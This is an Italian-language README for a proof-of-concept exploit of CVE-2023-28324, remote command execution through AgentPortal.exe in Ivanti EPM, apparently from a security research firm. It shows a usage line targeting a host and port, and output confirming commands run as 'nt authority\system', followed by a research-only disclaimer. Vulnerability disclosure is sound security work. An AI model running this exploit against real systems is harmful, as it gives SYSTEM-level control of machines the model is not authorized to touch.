
Vulnerabilità Ivanti EPM AgentPortal RCE
POC per CVE-2023-28324 che interessa Ivanti EPM.
Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
Questa POC sfrutta una vulnerabilità in AgentPortal.exe per eseguire comandi arbitrari. Affinché questa POC funzioni, devi
fornire i tuoi riferimenti a AgentPortal.exe e APCommon.dll da un'installazione Ivanti EPM.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
Questo software è stato creato esclusivamente a scopo di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.